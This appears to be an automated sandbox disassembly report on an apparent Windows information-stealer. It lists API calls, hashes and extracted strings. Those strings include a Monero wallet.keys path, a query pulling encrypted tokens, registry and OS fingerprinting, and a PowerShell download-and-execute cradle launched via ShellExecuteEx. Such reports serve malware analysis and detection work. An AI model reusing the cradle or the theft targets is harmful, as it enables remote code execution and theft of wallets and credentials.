                              • API String ID: 2774356765-3474575989
                              • Opcode ID: d2e4cb6738e692ec2e1a0e4a1031d2dc39558fe6fd8f2fa7b19951b5fb1e76e1
                              • Instruction ID: 0a8dd7d9e8a461b5d00a4bd120173637b1a33dfcf117cf4b760641079e2e8b24
                              • Opcode Fuzzy Hash: d2e4cb6738e692ec2e1a0e4a1031d2dc39558fe6fd8f2fa7b19951b5fb1e76e1
                              • Instruction Fuzzy Hash: 5A212CB1E44218ABDB00DFD5CD49FAFB7B8FB44B54F104609F615BB280D77869018BA5
                              APIs
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A54839
                                • Part of subcall function 00A547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A54849
                              • InternetOpenA.WININET(00A70DF7,00000001,00000000,00000000,00000000), ref: 00A5610F
                              • StrCmpCA.SHLWAPI(?,0144F340), ref: 00A56147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00A5618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00A561B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00A561DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A5620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00A56249
                              • InternetCloseHandle.WININET(?), ref: 00A56253
                              • InternetCloseHandle.WININET(00000000), ref: 00A56260
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 5548177640f3b3ea75f09a6f33b14053341ec0ea3509becae06fb77708c1006a
                              • Instruction ID: b492f912d95dd930fc89b635bf13669c6e450def72273b40d6e4fb58edfd2390
                              • Opcode Fuzzy Hash: 5548177640f3b3ea75f09a6f33b14053341ec0ea3509becae06fb77708c1006a
                              • Instruction Fuzzy Hash: 9C515FB1A00218ABDB20DFA0DD49BEE77B8FB44701F508199BA05A71C1DB746A89CF95
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                              • lstrlen.KERNEL32(00000000), ref: 00A5BC9F
                                • Part of subcall function 00A68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A68E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00A5BCCD
                              • lstrlen.KERNEL32(00000000), ref: 00A5BDA5
                              • lstrlen.KERNEL32(00000000), ref: 00A5BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: c12282f691f03c5e36d890f6e5c629ac7f5ae58d9e843af05bc73c90fc028a36
                              • Instruction ID: f379bbd825541b1af4efe88b89e302c9ea632b03100c0e9f1a86e6c70ea64de2
                              • Opcode Fuzzy Hash: c12282f691f03c5e36d890f6e5c629ac7f5ae58d9e843af05bc73c90fc028a36
                              • Instruction Fuzzy Hash: E7B11C72910108ABDB04FBA4DE96EEE7378BF64301F504569F506B7091EF346A49CFA2
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 5636e12343d0fc11e7d71bbdbe46008945fe6e73d3624690e82d0e644bd790cf
                              • Instruction ID: c7c6567dfeba219074fe6d1a8d8dcac7f6e1d092770560f0735921e66da8ef48
                              • Opcode Fuzzy Hash: 5636e12343d0fc11e7d71bbdbe46008945fe6e73d3624690e82d0e644bd790cf
                              • Instruction Fuzzy Hash: D2F0FE31944219EFD7449FE0E90E76C7B70FB09707F14019AE60986290D6744B61DBD6
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00A54FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A54FD1
                              • InternetOpenA.WININET(00A70DDF,00000000,00000000,00000000,00000000), ref: 00A54FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00A55011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00A55041
                              • InternetCloseHandle.WININET(?), ref: 00A550B9
                              • InternetCloseHandle.WININET(?), ref: 00A550C6
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 53db3a8d8b2f61d20acdeb39cd9a8684fe5a1560da7a019971f2489acea36131
                              • Instruction ID: f0b13b2a4b754630f227f4105cfac2277f2b6e24346bca07bff0549951c6fe50
                              • Opcode Fuzzy Hash: 53db3a8d8b2f61d20acdeb39cd9a8684fe5a1560da7a019971f2489acea36131
                              • Instruction Fuzzy Hash: A031F7B4A40218ABDB20CF94DD89BDDB7B4FB48704F1081D9FA09A7281C7706EC58F99
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00A68426
                              • wsprintfA.USER32 ref: 00A68459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00A6847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00A6848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00A68499
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,0144EE08,00000000,000F003F,?,00000400), ref: 00A684EC
                              • lstrlen.KERNEL32(?), ref: 00A68501
                              • RegQueryValueExA.ADVAPI32(00000000,0144ED18,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00A70B34), ref: 00A68599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00A68608
                              • RegCloseKey.ADVAPI32(00000000), ref: 00A6861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 39bfafeac7f207cea1000ca08da4288b5fd318e5e91dfd79e495ee789f71a10e
                              • Instruction ID: 81d7621251acef6ad3d2f07e9cc81146f879f7bf8514f99d5c45e9eb8ee1a27f
                              • Opcode Fuzzy Hash: 39bfafeac7f207cea1000ca08da4288b5fd318e5e91dfd79e495ee789f71a10e
                              • Instruction Fuzzy Hash: 8F21E971A10218AFDB24DB54DC89FE9B3B8FB48700F00C5D9E609A6180DF756A85CFD4
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A676A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A676AB
                              • RegOpenKeyExA.ADVAPI32(80000002,0143B980,00000000,00020119,00000000), ref: 00A676DD
                              • RegQueryValueExA.ADVAPI32(00000000,0144ED60,00000000,00000000,?,000000FF), ref: 00A676FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00A67708
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: a3c6352f6111910db44b9237827755b35506f0d8fec8a47fcd523bed4093e59a
                              • Instruction ID: 12360b1508691f3cc795aadb373bee17243cbcb5ea256e610ca6de7b134ee92d
                              • Opcode Fuzzy Hash: a3c6352f6111910db44b9237827755b35506f0d8fec8a47fcd523bed4093e59a
                              • Instruction Fuzzy Hash: F40162B5A04204FBDB00DBE4DD4EF6DB7B8EB48705F108455FA04D72D1E67099008B95
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A67734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A6773B
                              • RegOpenKeyExA.ADVAPI32(80000002,0143B980,00000000,00020119,00A676B9), ref: 00A6775B
                              • RegQueryValueExA.ADVAPI32(00A676B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00A6777A
                              • RegCloseKey.ADVAPI32(00A676B9), ref: 00A67784
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 82e0b9b7da80ac904fe4dfb7a4773750bf8790d4a4774ffe16511dd939bcc925
                              • Instruction ID: 24c658632f818bd3bbae4b929391b00274ce19d5f4e8668ef5a4e2099b8a4e69
                              • Opcode Fuzzy Hash: 82e0b9b7da80ac904fe4dfb7a4773750bf8790d4a4774ffe16511dd939bcc925
                              • Instruction Fuzzy Hash: F30112B5A40308FBDB00DBE4DC4EFAEB7B8EB48705F104559FA05A72D1DA749A008B95
                              APIs
                              • memset.MSVCRT ref: 00A640D5
                              • RegOpenKeyExA.ADVAPI32(80000001,0144DD60,00000000,00020119,?), ref: 00A640F4
                              • RegQueryValueExA.ADVAPI32(?,0144EEE0,00000000,00000000,00000000,000000FF), ref: 00A64118
                              • RegCloseKey.ADVAPI32(?), ref: 00A64122
                              • lstrcat.KERNEL32(?,00000000), ref: 00A64147
                              • lstrcat.KERNEL32(?,0144EEF8), ref: 00A6415B
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
                              • Opcode ID: 232677c5a3303c14795e3967193931a21461ab573ec9aef60ea93c81746f76d5
                              • Instruction ID: 7410eba3ed4f608a1ed49691d27a34667f56cf07fb7202738bdd54b81baada07
                              • Opcode Fuzzy Hash: 232677c5a3303c14795e3967193931a21461ab573ec9aef60ea93c81746f76d5
                              • Instruction Fuzzy Hash: 824157B7D00108ABDB14EBA0DD5AFFE737DBB88300F404559B61657181FA755B888BE2
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A599EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A59A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00A59A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,00A5148F,00000000), ref: 00A59A5A
                              • LocalFree.KERNEL32(00A5148F), ref: 00A59A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00A59A9A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 122894c0f125aede9f850ac6ea601be95662c816398f8655b99de5dc01dfc993
                              • Instruction ID: 4f5f5c2469f35ba422eb3aa13956f73955e810ce3767f657fa032fa259167f93
                              • Opcode Fuzzy Hash: 122894c0f125aede9f850ac6ea601be95662c816398f8655b99de5dc01dfc993
                              • Instruction Fuzzy Hash: 81312BB4A00209EFDB14CF94C989BEE77B5FF48341F108159E911AB290D774AA46CFA1
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Typememset
                              • String ID:
                              • API String ID: 3530896902-3916222277
                              • Opcode ID: 995e4a360798d10cbb0844490a94e589097e5cbeaec8330c1ff464ccee71ccb5
                              • Instruction ID: 88cbf15b596a7cc6200b4b37ef803c6d010b119b76cb7c2d6909550c3e990407
                              • Opcode Fuzzy Hash: 995e4a360798d10cbb0844490a94e589097e5cbeaec8330c1ff464ccee71ccb5
                              • Instruction Fuzzy Hash: 0141E5B250079C5EDB328B24CD84FFBBBF8AB45714F1444E8E9CA87182E2719A45DF60
                              APIs
                              • lstrcat.KERNEL32(?,0144EFD0), ref: 00A647DB
                                • Part of subcall function 00A68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A68E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00A64801
                              • lstrcat.KERNEL32(?,?), ref: 00A64820
                              • lstrcat.KERNEL32(?,?), ref: 00A64834
                              • lstrcat.KERNEL32(?,0143A7F8), ref: 00A64847
                              • lstrcat.KERNEL32(?,?), ref: 00A6485B
                              • lstrcat.KERNEL32(?,0144DFC0), ref: 00A6486F
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A68D90: GetFileAttributesA.KERNEL32(00000000,?,00A51B54,?,?,00A7564C,?,?,00A70E1F), ref: 00A68D9F
                                • Part of subcall function 00A64570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00A64580
                                • Part of subcall function 00A64570: RtlAllocateHeap.NTDLL(00000000), ref: 00A64587
                                • Part of subcall function 00A64570: wsprintfA.USER32 ref: 00A645A6
                                • Part of subcall function 00A64570: FindFirstFileA.KERNEL32(?,?), ref: 00A645BD
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 4a3ab082e7de580ae52370587dc7fa09d51d9e59b488d569e4c30410fdf12f1d
                              • Instruction ID: 48f1919211c1092027325db924f4e27a37e1341e4d3b1dc7c79e12aa1b09e165
                              • Opcode Fuzzy Hash: 4a3ab082e7de580ae52370587dc7fa09d51d9e59b488d569e4c30410fdf12f1d
                              • Instruction Fuzzy Hash: 77315EB2900218A7CB14FBB0DD89FED737CAB58700F444589B71996081EE7496898B95
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00A62D85
                              Strings
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00A62CC4
                              • ')", xrefs: 00A62CB3
                              • <, xrefs: 00A62D39
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00A62D04
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: fac38b9f0f5b53be8c83f3f1fea1b0a3cf4513b1fa8f11e4be70c8831077a542
                              • Instruction ID: 53362794a569e61527bbe32459047301080737b74a62c5d965929dd38202eea2
                              • Opcode Fuzzy Hash: fac38b9f0f5b53be8c83f3f1fea1b0a3cf4513b1fa8f11e4be70c8831077a542
                              • Instruction Fuzzy Hash: C7419D71D102089ADB14FFA0CE96FEDBB78AF24300F508529E516B7191DF746A4ACF92
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00A59F41
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 31a113dd4527d0e319448f4bc513a607507204165eeb6def9a1f804d1efa1423
                              • Instruction ID: 4d199b0bd287a0d2efdef9d42c6557c9cba27d0d1b6ffcce62450ffb6d82adcf
                              • Opcode Fuzzy Hash: 31a113dd4527d0e319448f4bc513a607507204165eeb6def9a1f804d1efa1423
                              • Instruction Fuzzy Hash: FE612D71A10248EBDB24EFA4CD96FED7775BF64340F008518F90AAF191EB706A09CB91
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 00A6696C
                              • sscanf.NTDLL ref: 00A66999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00A669B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00A669C0
                              • ExitProcess.KERNEL32 ref: 00A669DA
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: a7d5dd9fcae7b3926d837d950a0115e8b1d9ce4a9dd17a30d3cf41eeaaad6ca9
                              • Instruction ID: 8a783ddd4ab5933edeeb486824e05042b6ada9cea34850fb5403380238d8083d
                              • Opcode Fuzzy Hash: a7d5dd9fcae7b3926d837d950a0115e8b1d9ce4a9dd17a30d3cf41eeaaad6ca9
                              • Instruction Fuzzy Hash: 9E21AB75D14209ABCF04EFE4D949AEEB7B9BF48300F04852AE516E3250EB345605CBA9
